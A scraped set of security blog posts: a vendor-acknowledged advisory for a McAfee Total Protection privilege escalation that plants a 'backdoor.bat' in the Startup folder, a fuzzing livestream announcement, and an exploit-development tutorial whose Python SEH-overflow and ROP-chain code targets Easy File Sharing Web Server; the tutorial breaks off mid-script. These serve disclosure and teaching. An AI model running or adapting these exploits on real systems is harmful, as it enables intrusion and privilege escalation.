McAfee Total Protection (MTP) < 16.0.R26 Escalation of Privilege (CVE-2020-7283)

By: admin
14 July 2020 at 05:37

Summary

Assigned CVE: CVE-2020-7283 has been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 09/03/2020

Exploit Code: https://github.com/RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP

Vendor’s Advisory: https://service.mcafee.com/webcenter/portal/oracle/webcenter/page/scopedMD/s55728c97_466d_4ddb_952d_05484ea932c6/Page29.jspx?showFooter=false&articleId=TS103062&leftWidth=0%25&showHeader=false&wc.contextURL=%2Fspaces%2Fcp&rightWidth=0%25&centerWidth=100%25&_adf.ctrl-state=72mvomkv4_9&_afrLoop=1512627449091793#!

An Elevation of Privilege (EoP) exists in McAfee Total Protection (MTP) < 16.0.R26 . The latest version we tested is McAfee Total Protection (MTP) 16.0.R23. The exploitation of this EoP , gives the ability to a low privileged user to create a file anywhere in the system. The file is being created with a DACL , which allows any user to edit the file. Because of this, the attacker can create a file with any chosen name.extension and edit it in order to execute the code of his choice.

If the file already exists, it will be overwritten, with an empty file. 

There are many ways to abuse this issue. We chose to create a bat file in the Users Startup folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat .

Description

Whenever a scan is initiated, the process MMSSHOST.EXE which runs as an NT AUTHORITY\SYSTEM, and without impersonation, creates the file c:\ProgramData\McAfee\MSK\settingsdb.dat .

The permissions which are assigned to this file, allow to the “Authenticated Users” to have full control over the file.

When we first log into the windows system and without performing any actions, the file c:\ProgramData\McAfee\MSK\settingsdb.dat and the files MSK*.dat in the same folder, are not locked (they are not used by any program) and we have the proper permissions in order to delete them.

After we delete these files, we can make “C:\ProgramData\McAfee\MSK\settingsdb.dat”, a symlink to any chosen file.

With the symlink in place, the initiation of a scan will trigger the execution of the MMSSHOST.EXE.

At this very moment, If we initiate a scan, the MMSSHOST.EXE will try to create the file C:\ProgramData\McAfee\MSK\settingsdb.dat , it will follow the symlink and will actually create the file which is pointed by the symlink.

After that, it will set the new permissions to that file, which allows to the “Authenticated Users” to have full control over the newly created file. Most of the times, the newly created file will remain locked and we will not be able to edit it until we reboot. After the reboot, the file is unlocked and we can edit the file and add any contents we like.

Note: Although we exploited the issue by creating symlinks of the files under the path c:\ProgramData\McAfee\MSK\ , the files under the folder c:\ProgramData\McAfee\MPF\ seem to be affected as well.

Exploitation

In order to Exploit the issue, you can use our exploit from our GitHub .

In the following paragraph, a step by step explanation of the Video PoC where we use the exploit is provided.

Video PoC Step By Step

The exploit takes as an argument the file you want to create .


00:00-02:03: We present the environment. We are low privileged users and as we can see by default, the low privileged users cannot create files under the folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup . The folder at the moment is empty.

02:03-02:35: We run the exploit and we pass the file we want to create as argument. In this example we pass as argument the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat”. When the exploit instructs us to scan a file, we perform the scan and the file is created.

02:35-03:23: We present the fact that attacker has full access over the file. Moreover, we add the line “notepad.exe”, which is going to execute the notepad.exe in the context of any user which perform a login into the system. This is a bat file, so you can add the code of your choice (for example a reverse shell).

3:23-end: After the exploitation, another user logs into the system. In our example the administrator. The notepad.exe is executed because of the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat” file.

Resources

GitHub

You can find the exploit code in our GitHub at https://github.com/RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post McAfee Total Protection (MTP) < 16.0.R26 Escalation of Privilege (CVE-2020-7283) appeared first on REDYOPS Labs.

Fuzz Week 2020

12 July 2020 at 07:11

Summary

Welcome to fuzz week 2020! This week (July 13th - July 17th) I’ll be streaming every day going through some of the very basics of fuzzing all the way to cutting edge research. I want to use this time to talk about some things related to fuzzing, particularly when it comes to benchmarking and comparing fuzzers with each other.

Schedule

Ha. There’s really no schedule, there is no script, there is no plan, but here’s a rough outline of what I want to cover.

I will be streaming on my Twitch channel at approximately 14:00 PST. But things aren’t really going to be on a strict schedule.

My Twitter is probably the best source of information for when things are about to start.

Everything will be recorded and uploaded to my YouTube.

July 13th

The very basics of fuzzing. We’ll write our own fuzzer and tweak it to improve it. We’ll probably start by writing it in Python, and eventually talk about the performance ramifications and the basics of scaling fuzzers by using threads or multiple processes. We’ll also compare our newly written fuzzer against AFL and see where AFL outperforms it, and also where AFL has some blind spots.

July 14th

Here we’ll cover code coverage. We might get to this sooner, who knows. But we’re going to write our own tooling to gather code coverage information such that we can see not only how easy it is to set up, but how flexible coverage information can be while still proving quite useful!

July 15th-17th

Here we’ll focus mainly on the advanced aspects of fuzzing. While this sounds complex, fuzzing really hasn’t become that complex yet, so follow along! We’ll go through some of the more deep performance properties of fuzzing, mainly focused around snapshot fuzzing.

Once we’ve discussed some basics of performance and snapshot fuzzing, we’ll start talking about the meaningfulness of comparing fuzzers. Namely, the difficulties in comparing fuzzers when they may involve different concepts of what a crash, coverage, or input are. We’ll look at some existing examples of papers which compare fuzzers, and see how well they actually prove their point.

Biases

I think it’s important when doing something like this, to make it clear what my existing biases are. I’ve got a few.

  • I think existing fuzzers have some major performance problems and struggle to scale. I consider this to be a high priority as general performance improvements to fuzzing harnesses makes both generic fuzzers (eg. AFL, context-unaware fuzzers) and hand-crafted (targeted) fuzzers better.
  • I don’t think outperforming AFL is impressive. AFL is impressive because it’s got an easy-to-use workflow, which makes it accessible to many different users, broadening the amount of targets it has been used against.
  • I don’t really thinking comparing fuzzers is reasonable.
  • I think it is very easy to over-fit a fuzzer to small programs, or add unrealistic amounts of information extraction from a target under test, in a way that the concepts are not generally applicable to many targets that exceed basic parsers. I think this is where a lot of current research falls.

But… that’s mainly the point of this week. To either find out my biases are wildly incorrect, or to maybe demonstrate why I have some of the biases. So, how will I address some of these (in order of prior bullets)?

  • I’ll compare some of my fuzzers against AFL. We’ll see if we can outperform AFL in terms of raw fuzz cases performed, as well as the results (coverage and crashes).
  • I’ll try to demonstrate that a basic fuzzer with 1/100th the amount of code of AFL is capable of getting much better results, and that it’s really not that hard to write.
  • I’ll propose some techniques that can be used to compare fuzzers, and go through my own personal process of evaluating fuzzers. I’m not trying to get papers, or funding, or anything. I don’t really have an interest in making things look comparatively better. If they perform differently, but have different use cases, I’d rather understand those cases and apply them specifically rather than have a one-shoe-fits-all solution.
  • I’ll go through some instrumentation that I’ve historically added to my fuzzers which give them massive result and coverage boosts, but consume so much information that they cannot meaningfully scale past tiny pieces of code. I’ll go through when these things may actually be useful, as sometimes isolating components is viable. I’ll also go through some existing papers and see what sorts of results are being claimed, and if they actually have general applicability.

Winging it

It’s important to note, nothing here is scheduled. Things may go much faster, slower, or just never happen. That’s the beauty of research. I may be very wrong with some of my biases, and we’ll hopefully correct those. I love being wrong.

I’ve maybe thought of having some fuzzing figureheads pop on the stream for random discussions/conversations/interviews. If this is something that sounds interesting to you, reach out and we can maybe organize it!

Sound fun?

See you there :)


Exploit Development: Playing ROP’em COP’em Robots with WriteProcessMemory()

11 July 2020 at 00:00

Introduction

The other day on Twitter, I received a very kind and flattering message about a previous post of mine on the topic of ROP. Thinking about this post, I recall utilizing VirtualProtect() and disabling ASLR system wide to bypass DEP. I also used an outdated debugger, Immunity Debugger at the time, and I wanted to expand on my previous work, with a little bit of a less documented ROP technique and WinDbg.

Why is ROP Important?

ROP/COP and other code reuse apparatuses are very important mitigation bypass techniques, due to their versatility. Binary exploit mitigations have come a long way since DEP. Notably, mitigations such as CFG, upcoming XFG, ACG, etc. have posed an increased threat to exploit writers as time has gone on. ROP still has been the “Swiss army knife” to keep binary exploits alive. ROP can result in arbitrary write and arbitrary read primitives - as we will see in the upcoming post. Additionally, data only attacks with the implementation of ACG have become crucial. It is possible to perform data only attacks, although expensive from a technical perspective, by writing payloads fully in ROP.

What This Blog Assumes and What This Blog ISN’T

If you are interested in a remote bypass of ASLR and a 64-bit version of bypassing DEP, I suggest reading a previous blog of mine on this topic (although, undoubtedly, there are better blogs on this subject).

This blog will not address ASLR or 64-bit exploitation (read my previous post if that is what you are looking for) - and will be utilizing non-ASLR compiled modules, as well as the x86 __stdcall calling convention (technically an “ASLR bypass”, but in my opinion only an information leak = true ASLR bypasses).

Why are these topics not being addressed? This post aims to focus on a different, less documented approach to executing code with ROP. As such, I find it useful to use the most basic, straightforward example to hopefully help the reader fully understand a concept. I am fully aware that it is 2020 and I am well aware mitigations such as CFG are more common. However, generally the last step in exploitation, no matter HOW many mitigations there are (unless you are performing a data only attack), is bypassing DEP (in user mode or kernel mode). This post aims to address the latter portion of the last sentiment - and expects the reader already has an ASLR bypass primitive and a way to pivot to the stack.

Expediting The Process

The application we will be going after is Easy File Sharing Web Server 7.2, which has a memory corruption vulnerability as a result of an HTTP request.

The offset to SEH is 2563 bytes. Instead of using a pop <reg> pop <reg> ret sequence, as is normally done on a 32-bit SEH exploit, an add esp, <bytes> instruction is used. This will take the stack, where it is currently not controlled by us, and change the address to an address on the stack that we control - and then return into it.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain
crash += struct.pack('<L', 0x90909090)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

Set a breakpoint on the stack pivot of add esp, 0x1004 ; ret with the WinDbg command bp 0x10022869. After sending the exploit POC - we will need to view the contents of the exception handler with the WinDbg command !exchain.

As a breakpoint has already been set on the address inside of SEH, all that is needed to pass the exception is resuming execution with the g command in WinDbg. The breakpoint is hit, and we will step through the instruction of add esp, 0x1004 (t in WinDbg) to take control of the stack.

As a point of contention, we have about 980 bytes to work with.

The Call to WriteProcessMemory()

What is the goal of this method of bypassing DEP? The goal here is to not to dynamically change permissions of memory to make it executable - but to instead write our shellcode, dynamically, to already executable memory.

As we know, when DEP is enabled, memory is either writable or executable - but not both at the same time. The previous sentiment about writing shellcode, via WriteProcessMemory(), to executable memory is a bit contradictory knowing this. If memory is executable, adhering to DEP’s rules, it shouldn’t be writable. WriteProcessMemory() overcomes this by temporarily marking memory pages as RWX while data is being written to a destination - even if that destination doesn’t have writable permissions. After the write succeeds, the memory is then marked again as execute only.

From an adversary’s perspective, this means something. Certain shellcodes employ encoding mechanisms to bypass character filtering. If this is the case, encoded shellcode which is dynamically written to execute only memory will fail when executed. This is due to the encoded shellcode needing to “write itself” over adjacent process memory to decode. Since pages are execute only, and we do not have the WriteProcessMemory() “pass” to write to execute only memory anymore, an access violation will occur. Something to definitely keep in mind.

Let’s take a look at the call to WriteProcessMemory() firstly, to help make sense of all of this (per Microsoft Docs)

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);

Let’s break down the call to WriteProcessMemory() by taking a look at each function argument.

  1. HANDLE hProcess: According to Microsoft Docs, this parameter is a handle to the desired process in which a user wants to write to the process memory. A handle, without going too much into detail, is a “reference” or “index” to an object. Generally, a handle is used as a “proxy” of sorts to access an object (this is especially true in kernel mode, as user mode cannot directly access kernel mode objects). We will look at how to dynamically resolve this parameter with relative ease. Think of this as “don’t talk to me, talk to my assistant”, where the process is the “me” and the handle is the “assistant”.
  2. LPVOID lpBaseAddress: This parameter is a pointer to the base address in which a write is desired. For example, if the region of memory you would like to write to was 0x11223344 - 0x11223355, the argument passed to the function call would be 0x11223344.
  3. LPCVOID lpBuffer: This is a pointer to the buffer that is to be written to the address specified by the lpBaseAddress parameter. This will be the pointer to our shellcode.
  4. SIZE_T nSize: The number of bytes to be written (whatever the size of the shellcode + NOPs, if necessary, will be).
  5. SIZE_T *lpNumberOfBytesWritten: This parameter is similar to the VirtualProtect() parameter lpflOldProtect, which inherits the old permissions of modified memory. However, our parameter inherits the number of bytes written. This will need to be a memory address, within the process space, that is writable.

Preserving a Stack Address

One of the pitfalls of ROP is that stack control is absolutely vital. Why? It is logical actually - each ROP gadget is appended with a ret instruction. ret, from a technical perspective, will take the value pointed to by RSP (or ESP in this case), which will be the next ROP gadget on the stack, and load it into RIP (EIP in this case). Since ROP must be performed on the stack, and due to the dynamic nature of the stack, the virtual memory addresses associated with the stack are also dynamic.

As seen below, when the stack pivot is successfully performed, the virtual address of the stack is 0x029a68dc.

Restarting the application and pivoting to the stack again, the virtual address of the stack is at 0x028068dc.

At first glance, this puts us in a difficult position. Even with knowledge of the base addresses of each module, and their static nature - the stack still seems to change! Although the stack is dynamically being resolved to seemingly “random” and “volatile to the duration of the process” memory - there is a way around this. If we can use a ROP gadget, or set of gadgets, properly - we can dynamically store an address around the stack into a CPU register.

Let’s start our ROP chain by preserving an address near the current stack pointer.

As you may or may not know, the base pointer (EBP) points to the “bottom” of the current stack frame (we will refer to the current stack frame as “the stack”). This means that EBP should be relatively close to ESP. We can validate this in WinDbg by viewing the current state of the CPU registers after the stack pivot.

After parsing the PE with rp++, to enumerate a list of ROP gadgets (you can view how to use rp++ by taking a look at my last ROP blog post) - a nice gadget resides in sqlite3.dll that can help us preserve the address of EBP into another “common” register, which has more useful ROP gadgets as we will see later on, such as EAX.

0x61c05e8c: xchg eax, ebp ; ret  ;  (1 found)

Replace the NOPs in the previous PoC script, under the “Begin ROP chain” comment, with the above address. After firing off the updated PoC, we land on our intended ROP gadget.

After executing the above gadget, EAX is now loaded with an address near the current stack.

Notice that EBP has also been set to 0, due to the ROP gadget. This will come into play shortly.

Although EAX is relatively close to ESP - it is still a decent ways away. Currently, EAX (which now contains the old value of EBP) is 0xfec bytes away from ESP.

To compensate for this, we will manipulate EAX to contain the address at ESP + 0x38.

Why ESP + 0x38 instead of just ESP you ask? This is a “preparatory” procedure (manipulating EAX to contain the address of ESP + 0x38).

As we will see later on, we would like to preserve an address around ESP into another “common” register, ECX. ECX is a register that is used as a “counter” (although technically it is a general purpose register). This means that ECX generally is a part of some more useful ROP gadgets.

In order to do this, the stack will eventually need to be increased by 0x24 bytes to get the value (technically future value) of ESP into ECX, due to the nature of the ROP gadgets available within the process memory. A ROP gadget will inadvertently perform an add esp, 0x24, resulting in collateral damage to get what we need accomplished, accomplished. There will be 4 ROP gadgets (plus an additional DWORD that will be “popped” into a register), for a total of 0x14 (20 decimal) bytes, that will need to be executed between now and when that add esp, 0x24 gadget is executed (0x38 - 0x24 = 0x14).

This is reason why we will set EAX to the value of ESP + 0x38 instead of ESP + 0x24, because we will need 0x14 bytes worth of ROP gadgets between then and now. By the time the ROP gadgets before the add esp, 0x24 instruction are executed, the value in EAX will be ESP + 0x24. However, if we loaded ESP + 0x24 into EAX now, then by the time we reach the add esp, 0x24 instruction, EAX will contain a value of ESP + 0x10.

Knowing this, and knowing that we would like EAX and ECX to be equal to the current value of ESP after the ESP + 0x38 stack manipulation occurs - we will prepare EAX in advance.

Note that this is by no means a requirement (getting EAX and ECX set to the EXACT value of ESP) when doing ROP. This will just make life easier in the future. If this doesn’t make sense now, do not worry. Just focus on the fact we would like to get EAX closer to ESP for the time being.

0x10018606: pop ecx ; ret  ;  (1 found)
0xffffefe0 (Value to be popped into EAX. This is the negative representation of the distance between the current value of EAX and ESP + 0x38). 
0x1001283e: sub eax, ecx ; ret  ;  (1 found)

Why the negative distance you ask? Let’s say we wanted to add 0x1024 to EAX. If we loaded 0x1024 into ECX, to add it to EAX, ECX would contain 0x00001024. As we can clearly see, ECX will contain NULL bytes - which will kill our exploit. Instead, we will use the negative representation of numbers and perform subtraction in order to get around this problem.

After the aforementioned gadget of exchanging EBP and EAX, program execution hits the pop ecx gadget.

The negative value of the distance between EAX and ESP + 0x38 is placed into ECX.

Program execution then transfers to the sub eax, ecx ROP gadget, which will place the difference into the EAX register.

This yields our desired result.

Note that 0xCCCCCCCC is denoted as a visual for where we hope our program execution resumes at after all of this craziness. Our goal is for when the last ret occurs, it returns into this DWORD.

The goal now is to get the current value of EAX into ECX. There is a nice ROP gadget that will do this for us.

0x61c6588d: mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave  ; ret  ;  (1 found)

This gadget will take EAX and place it into ECX. Then, a mov eax, ecx instruction will occur - which is meaningless because ECX and EAX already contain the same value - meaning this part of the gadget basically just serves as a “NOP” of sorts. ESP then gets raised by 0x24 bytes, which we can compensate for - so this isn’t an issue. pop ebx can be compensated for as well, but leave will be a problem as this will directly manipulate ESP, throwing our ROP execution flow off.

leave, from a technical perspective, will perform a mov esp, ebp and a pop ebp instruction.

mov esp, ebp will place EBP into ESP. Let’s think about how we can leverage this.

We know that currently EAX contains our target address. We also can recall from earlier that EBP is currently set to 0. If we could place EAX into EBP BEFORE the leave instruction executes - it would set ESP to ESP + 0x24 (at the time of the instruction executing) because of the mov esp, ebp instruction - which sets ESP to whatever EBP is. Due to the add esp, 0x24 gadget that occurs before the leave instruction - this would actually end up setting ESP to ESP, which is what we want. The goal here is to restore ESP back to our controlled data, which consists of our ROP gadgets.

It is a bit of a mouthful and “mind bender” of sorts - so do not worry if it is hazy or confusing at the moment. Viewing this step by step in the debugger will help make sense of all of this.

Note, after each gadget - obviously the value of ESP changes. For completeness sake, until we hit the add esp, 0x24 gadget - we will refer to the “target” ESP + 0x38 address as ESP + 0x38 (even though the offset will technically shrink after each gadget is executed).

First, as mentioned above, we need to get the value in EAX into EBP to prepare for the leave instruction.

0x61c30547: add ebp, eax ; ret  ;  (1 found)

How does adding EAX to EBP place EAX into EBP? Recall that EBP is set to 0 and EAX contains the memory address of ESP + 0x38. That address of ESP + 0x38 will get added to the number 0, which doesn’t alter it in any way, and the result of the addition is placed into EBP - essentially “moving” the address into EBP.

Let’s step through all of this in WinDbg - to make things a bit more clear.

First, program execution reaches the add ebp, eax instruction.

EBP currently is set to 0 and EAX is set to ESP + 0x38

Stepping through the instruction yields the desired result of placing ESP + 0x38 into EBP.

After EBP is prepared, program execution reaches the next ROP gadget.

After stepping through the mov ecx, eax gadget - ECX and EAX are now both set to ESP + 0x38.

Stepping through the mov eax, ecx instruction doesn’t affect the EAX or ECX registers at all, as ECX (which is already equal to EAX) is placed into EAX.

Taking a look on the stack now, we can see our compensation for add esp, 0x24 and pop ebx between the address before 0xCCCCCCCC

Program executing has also reached the add esp, 0x24 instruction.

Stepping through the instruction, the stack as been set to the same values in EAX, ECX, and EBP.

Then, pop ebx clears the last bit of “padding” on the stack.

After all of this has occurred, the leave instruction is loaded up for execution.

leave ; ret is executed, and the execution of our ROP chain resumes its course - all while preserving ESP into ECX and EAX!

WriteProcessMemory() Parameters

Recall that we are dealing with the x86 architecture, meaning function calls go through __stdcall instead of __fastcall. This means that instead of placing our function arguments into RCX, RDX, R8, R9, RSP + 0x20, and so on - we can just simply place our parameters on the stack, as such.

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

Let’s talk about where these parameters come from.

To “bypass” Windows’ ASLR (the OS DLLs still use ASLR, even if this application doesn’t) - we can leverage the Import Address Table (IAT).

Whenever a program calls a Windows API function - it does not do so directly. A special table, within the process space, known as the IAT essentially contains pointers to each needed API function.

The IAT for this application is located at the .exe base + 0x166000 and it is 0xC40 bytes in size.

As is seen in the image above, the IAT just contains pointers to Windows API functions. Meaning each of these functions points to a Windows API function.

We have “the base address” of each module (in reality, each module is just not compiled with ASLR) - so that is no problem. However, the value that each of these functions points to (which is a Windows API function) will change upon reboot.

The way to get around this, would be to load one of these IAT entries into a register we control (such as ECX) and then perform a mov ecx, dword ptr [ecx] instruction - an arbitrary read.

This would extract whatever ECX points to (which is a Windows API function) and place it into ECX. Even though Windows will randomize the addresses of the API, we can still leverage the fact each IAT will always point to the same Windows API function (even if the address of the API changes) to make sure this is not a problem.

Although the IAT for this application doesn’t directly contain a function pointer to kernel32WriteProcessMemory - it does contain pointers to other kernel32.dll pointers, such as kernel32!WriteFileImplementation. We also know that the distance between each function with a DLL DOESN’T CHANGE. This means, the distance between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory will always remain the same for the current patch level and OS version.

This gives us a primitive to dynamically resolve the location of kernel32!WriteProcessMemory.

crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)

The next “parameter” is not really even a parameter at all. Similarly to my last ROP post, this will be used as the address in which program execution will transfer to AFTER the call to kernel32!WriteProcessMemory is made. This will also be the same address as our shellcode.

Why 0x61c72530 specifically?

sqlite3.dll is a module of the application - meaning it is a part of process memory. Since this DLL is required for the application to work, we can target it as a place to write our shellcode. With this method of ROP, we need to find an executable portion of memory within the application and its modules. Then, using the call to kernel32!WriteProcessMemory - we will write our shellcode to this executable portion of memory. Using the command !dh sqlite3 in WinDbg, we can determine the .text section of the portable executable has execute permissions. Also recall that even without write permissions, we can still write our shellcode if we “proxy” the write through the API call.

Viewing the .text section address - we can see that the address chosen is just an executable “code cave” that is not initialized to any memory - meaning that if we corrupt this memory, the program shouldn’t care.

This means, after the function call is completed and our shellcode is written here - program execution will transfer to this address.

crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)

The handle parameter is quite easy to fill - we can even use a static value. According to Microsoft Docs, GetCurrentProcess() returns a handle to the current process. More specifically, it returns a “pseudo handle” to the current process. A pseudo handle, denoted by -1 or 0xFFFFFFFF, is “special” constant that refers to a handle to the current process. This means, whenever a Windows API function requests a handle (generally in user mode), passing 0xFFFFFFFF will tell the API in question to utilize a handle to the current process. Since we would like to write our shellcode to memory within the process space - passing 0xFFFFFFFF to the kernel32!WriteProcessMemory function call will tell the function we would like to write the memory to virtual memory within the current process space.

crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 

lpBaseAddress will be the address of our shellcode, as already outlined by the “return” parameter.

crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)

lpBuffer will be a pointer to our shellcode (which will first need to be written to the stack). We will dynamically resolve this with ROP gadgets.

crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 

nSize will be the size of our shellcode.

crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

Lastly, lpNumberofBytesWrittne will be any writable address.

Let’s ROP v2!

We will be using what some have dubbed the “pointer” method of ROP (when it comes to x86 at least), where we will place these parameter “placeholders” on the stack and then dynamically change what these parameters point to in order to make a successful function call. Here is the PoC we will be using.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX vai "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack)  - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
